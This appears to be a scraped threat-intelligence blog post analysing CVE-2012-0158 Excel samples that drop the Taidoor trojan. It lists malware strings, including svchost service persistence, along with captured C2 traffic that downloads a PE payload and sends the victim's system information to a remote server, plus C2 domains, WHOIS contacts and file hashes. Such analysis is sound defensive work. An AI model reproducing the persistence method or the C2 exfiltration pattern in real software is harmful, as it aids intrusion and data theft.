10007014: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
10007058: 'Connection:close',0
1000706C: 'Cache-Control: max-age=259200',0
1000708C: 'Pragma: no-cache',0
100070A0: 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)',0
100070D4: 'Content-Type: application/octet-stream',0
100070FC: 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*',0
10007138: 'Accept-Language: en-en',0
10007150: '%s%02x',0
1000715C: 'home.asp',0
10007168: 'index.css',0
10007174: 'index.jsp',0
10007180: 'index.php',0
1000718C: 'index.asp',0
1000719C: '/%s/%s/',0
100071A4: '%02d',0
100071AC: '%04d',0
100071B4: '%s_%s',0
100071BC: '%s:%d',0
100071C4: 'Content-Length:%d',0Dh,0Ah,0
100071D8: 'POST',0
100071E0: 'HTTP/1.1',0
100071EC: '%H:%M:%S',0
100071F8: '\*.*',0
10007210: 'Windows Infrared Port Monitor.',0
10007314: 'SvcHostDLL.exe',0
10007348: 'RegSetValueEx(ServiceDll)',0
10007364: 'ServiceDll',0
10007370: 'GetModuleFileName() get dll path',0
10007394: 'RegCreateKey(Parameters)',0
100073B0: 'Parameters',0
100073BC: 'SYSTEM\CurrentControlSet\Services\',0
100073E0: '%SystemRoot%\System32\svchost.exe -k netsvcs',0
10007410: 'OpenSCManager()',0
10007420: 'RegQueryValueEx(Svchost\netsvcs)',0
10007444: 'netsvcs',0
1000744C: 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost',0
10007484: 'WmdmPmSp',0
10007490: 'CT2.1',0
10007498: ' /c ',0
100074A0: '%ComSpec%',0
100074BC: 'Win9X',0
100074C4: 'WinNT',0
100074CC: 'Win2003',0
100074D4: 'WinXP',0
100074DC: 'Win2K',0
100074E4: 'Vista',0
100074EC: 'Unknow',0
10007974: 'Plugin_End',0
10007980: 'Plugin_Start',0
10007990: 'Plugin_Init',0
1000799C: 'Plugin_GetID',0
100079B0: ' /A /C ',0
100079B8: 'ComSpec',0
100079C8: '\IntelAMTPP.dll',0
100079DC: '\MSCDRUN.bat',0
100079EC: 'c:\Progra~1\common~1\Driver',0
10007A08: 'CommonProgramFiles',0
10007A28: ',RundllUninstall WmdmPmSp',0Dh,0Ah,0
10007A54: 'net stop WmdmPmSp',0Dh,0Ah,0

Traffic Download pcaps here (this is approximately 24 hours of activity)

ct.datangcun.com 67.198.146.130 United States AS35908 VPLS Inc. d/b/a Krypt T VPLS Inc. d/b/a Krypt Technolog
www.mlitjcab.com 112.175.245.222 Korea, Republic of AS4766 Korea Telecom Korea Telecom
121.63.150.15 China AS4134 Chinanet CHINANET HUBEI PROVINCE NETWORK

POST /NfLog/Nfile.asp HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1)
Host: www.mlitjcab.com
Content-Length: 0
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2012 04:55:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 67080
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACCARCDD=OKNPGCKDLEKEHBOHIHLCOMHD; path=/
Cache-control: private

67072..wMZ......................@...............................................!..L.!This program cannot be run in DOS mode.

$.......*h..n...n...n.......m.......o.......h.......o.......k.......j.......l...X/..m...n.......1+..b...1+..o...X/..c....)..o...Richn...................PE..L...._.P...........!....................................................................................................Y..
..............................................................
POST /NfLog/TTip.asp HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.mlitjcab.com
Content-Length: 8
Cache-Control: no-cache
Cookie: ASPSESSIONIDACCARCDD=OKNPGCKDLEKEHBOHIHLCOMHD

w.w.w...HTTP/1.1 200 OK
Date: Mon, 06 Aug 2012 04:55:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13
Content-Type: text/html
Cache-control: private

68.55.106.119POST /NfLog/NfStart.asp?ClientId=192.168.106.141%20<49d0>%2068.55.106.119&Nick=KH0710myk*&dtime=T:8-6-0-53 HTTP/1.1
Accept: */*
Use-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.mlitjcab.com
Content-Length: 36
Cache-Control: no-cache
Cookie: ASPSESSIONIDACCARCDD=OKNPGCKDLEKEHBOHIHLCOMHD

..............................9.9.9.HTTP/1.1 200 OK

Date: Mon, 06 Aug 2012 04:55:40 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Cache-control: private

POST /NfLog/NfHostInfo.asp?par=godata&ClientId=192.168.106.141%20<49d0>%2068.55.106.119 HTTP/1.1

Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.mlitjcab.com
Content-Length: 8601
Cache-Control: no-cache
Cookie: ASPSESSIONIDACCARCDD=OKNPGCKDLEKEHBOHIHLCOMHD

8593....C:\WINDOWS\system32\ipconfig /all

Windows IP Configuration

Host Name . . . . . . . . . . . . : DellXT

Primary Dns Suffix . . . . . . . :

Node Type . . . . . . . . . . . . : Hybrid

IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : localdomain

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
Physical Address. . . . . . . . . : 00-50-56-3C-F6-41
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.106.141
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.106.2
DHCP Server . . . . . . . . . . . : 192.168.106.254
DNS Servers . . . . . . . . . . . : 192.168.106.2
Primary WINS Server . . . . . . . : 192.168.106.2
Lease Obtained. . . . . . . . . . : Monday, August 06, 2012 12:50:58 AM
Lease Expires . . . . . . . . . . : Monday, August 06, 2012 1:20:58 AM

C:\WINDOWS\system32\net start
These Windows services are started:
Application Layer Gateway Service
Bluetooth Support Service
COM+ Event System
Cryptographic Services
DCOM Server Process Launcher
[ shortened ] --------------------

..............................9.9.9.HTTP/1.1 200 OK
Date: Mon, 06 Aug 2012 05:11:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Cache-control: private

121.63.150.15 C2 re-transmission traffic

Registration Service Provided By: SHANGHAI BEST ORAY INFORMATION S&T CO., LTD.
Contact: +86.2062219000

C&C servers

mlitjcab.com
Registrant:
jiaxingkeji
jiaxingkeji (liuhaifeng06@hotmail.com)
haidian beijing
haiding
beijing,100080
AM
Tel. +86.1082545656
Fax. +86.1082545656

Creation Date: 2012-07-10 10:04:37
Expiration Date: 2013-07-10 10:04:37

Domain servers in listed order:
ns1.oray.net,ns2.oray.net

ct.datangcun.com
port:1353

Domain name: datangcun.com
Registrant Contact:
chj
haha ha xjc__smallcat@sohu.com
025-8084 fax: 025-8084
jiangsu nanjing
nanjing jiangsu 210046
CN

Historical data
Other domains registered under the same domain and their historical hosting
Some of them were C2s for Nflog over the past year or more.

liuhaifeng06@hotmail.com also registered

diaoyiku.net
thehappydoor.com
yunqizhang.net
zhuangyiku.net
daomeixiong.net
nalaner.net
boyiku.net
houdiao.net
jianyiku.net
feichaizhang.net
thehappydoor.net
saoyiku.net
maoyiku.net
embassyjp.com
seaairs.com
zhuangyiku.com
sheyiku.com
nalaner.com
saoyiku.com
diaoyiku.com
feichaizhang.com
boyiku.com
avgsafety.com
yunqizhang.com
tokyo-h0t.com
mlitjcab.com
trafficbusy.com
sheyiku.net

Hosting History

sheyiku.net
2011-05-03 New -none- 220.241.102.233
2012-05-14 Not Resolvable 220.241.102.233 -none-

trafficbusy.com
2005-12-19 New -none- 70.85.145.98
2006-01-28 Change 70.85.145.98 72.36.179.98
2006-12-13 Change 72.36.179.98 208.254.26.139
2007-03-03 Change 208.254.26.139 64.15.205.242
2007-03-10 Change 64.15.205.242 208.254.26.139
2007-11-02 Change 208.254.26.139 82.98.86.162
2008-12-22 Change 82.98.86.162 68.178.232.99
2009-02-02 Not Resolvable 68.178.232.99 -none-
2012-03-08 New -none- 84.16.228.113
2012-03-26 Change 84.16.228.113 118.140.12.50

mlitjcab.com
2012-07-11 New -none- 112.175.245.222
2012-07-13 Not Resolvable 112.175.245.222 -none-
2012-07-25 New -none- 112.175.245.222

tokyo-h0t.com
2012-07-05 New -none- 221.125.38.46

yunqizhang.com
We have no record of any IP changes.

avgsafety.com
2012-03-14 New -none- 67.198.171.67
2012-03-26 Not Resolvable 67.198.171.67 -none-

boyiku.com
2010-09-13 New -none- 127.0.0.1
2010-10-15 Not Resolvable 127.0.0.1 -none-
2011-04-10 New -none- 75.126.239.148
2012-05-14 Not Resolvable 75.126.239.148 -none-
2012-06-13 New -none- 199.59.241.216
2012-07-01 Change 199.59.241.216 199.59.241.214
2012-07-13 Change 199.59.241.214 199.59.241.207
2012-07-25 Change 199.59.241.207 199.59.241.203
2012-08-06 Change 199.59.241.203 199.59.241.188

feichaizhang.com
We have no record of any IP changes.

diaoyiku.com
2011-04-10 New -none- 75.126.219.26
2011-10-01 Change 75.126.219.26 98.126.113.27
2011-10-14 Change 98.126.113.27 174.139.232.195
2011-11-18 Change 174.139.232.195 216.83.63.147
2012-03-02 Change 216.83.63.147 174.36.84.190
2012-03-14 Change 174.36.84.190 42.208.58.126

saoyiku.com
We have no record of any IP changes.

nalaner.com
2007-03-02 New -none- 221.122.60.246
2007-05-20 Change 221.122.60.246 211.147.215.170
2008-03-02 Not Resolvable 211.147.215.170 -none-
2008-03-04 New -none- 218.5.78.85
2008-03-23 Change 218.5.78.85 209.62.72.189
2008-03-30 Not Resolvable 209.62.72.189 -none-
2008-05-06 New -none- 69.64.155.79
2008-05-11 Not Resolvable 69.64.155.79 -none-
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 74.86.111.96
2012-05-14 Not Resolvable 74.86.111.96 -none-
2012-06-17 New -none- 23.23.232.244
2012-06-20 Change 23.23.232.244 0.0.0.0

sheyiku.com
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 74.86.75.10
2011-11-29 Not Resolvable 74.86.75.10 -none-
2011-12-11 New -none- 74.86.75.10
2012-05-14 Not Resolvable 74.86.75.10 -none-

zhuangyiku.com
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 74.86.111.105
2012-05-14 Not Resolvable 74.86.111.105 -none-

seaairs.com
2012-03-08 New -none- 84.16.228.113
2012-06-08 Change 84.16.228.113 113.28.117.42
2012-07-01 Change 113.28.117.42 221.125.38.46

embassyjp.com
2008-03-30 New -none- 209.62.21.228
2008-04-06 Not Resolvable 209.62.21.228 -none-
2012-03-14 New -none- 84.16.228.113
2012-03-26 Change 84.16.228.113 27.131.32.132
2012-04-19 Change 27.131.32.132 27.131.32.128

maoyiku.net
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 75.126.194.228
2011-10-01 Change 75.126.194.228 98.126.113.27
2011-10-14 Change 98.126.113.27 174.139.232.195
2011-11-18 Change 174.139.232.195 216.83.63.147
2012-03-02 Change 216.83.63.147 174.36.84.190
2012-03-14 Change 174.36.84.190 54.235.225.45
2012-07-13 Change 54.235.225.45 174.139.132.37

saoyiku.net
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 76.73.43.158
2012-05-14 Not Resolvable 76.73.43.158 -none-

thehappydoor.net
We have no record of any IP changes.

feichaizhang.net
We have no record of any IP changes.

jianyiku.net
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 74.86.111.103
2011-10-01 Not Resolvable 74.86.111.103 -none-
2011-11-06 New -none- 216.83.41.85
2011-11-18 Change 216.83.41.85 216.83.63.155
2011-12-22 Not Resolvable 216.83.63.155 -none-
2012-01-03 New -none- 216.83.63.155
2012-05-14 Not Resolvable 216.83.63.155 -none-

houdiao.net
2011-04-10 New -none- 174.139.250.234
2012-05-14 Not Resolvable 174.139.250.234 -none-

boyiku.net
2011-04-10 New -none- 76.73.43.158
2011-04-21 Change 76.73.43.158 220.241.102.233
2011-09-05 Not Resolvable 220.241.102.233 -none-
2011-09-18 New -none- 220.241.102.233
2012-05-14 Not Resolvable 220.241.102.233 -none-

nalaner.net
We have no record of any IP changes.

daomeixiong.net
2009-09-24 New -none- 97.74.178.59
2009-12-24 Change 97.74.178.59 97.74.207.59
2010-04-01 Change 97.74.207.59 97.74.95.91
2010-04-24 Change 97.74.95.91 98.126.2.148
2010-05-14 Change 98.126.2.148 98.126.40.36
2010-09-03 Change 98.126.40.36 98.126.2.148
2010-09-13 Change 98.126.2.148 183.99.121.199
2010-10-15 Change 183.99.121.199 183.99.121.124
2010-11-06 Not Resolvable 183.99.121.124 -none-
2011-04-10 New -none- 174.139.250.234
2012-05-14 Not Resolvable 174.139.250.234 -none-
2012-06-20 New -none- 68.178.232.100

zhuangyiku.net
We have no record of any IP changes.

yunqizhang.net
We have no record of any IP changes.

3. 240727.xls

Clean decoy set.xls:

Payload ews.exe: 63d7ad4f9a5e8ede0218bad6e8d5c2e6 dropper for Trojan Taidoor (see Contagio for the same trojan)

SSDeep 3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/nGpOiz3EX:dbL6vr7ZtpxBbi636Ls0b6P4O4K

7A0D5BB0CA9992826BAD0B2241C4992B

File: ews.exe Size: 12800 MD5: 63D7AD4F9A5E8EDE0218BAD6E8D5C2E6

Pages

Thursday, August 9, 2012

CVE-2012-0158 generated "8861 password" XLS samples and analysis

No comments:

Post a Comment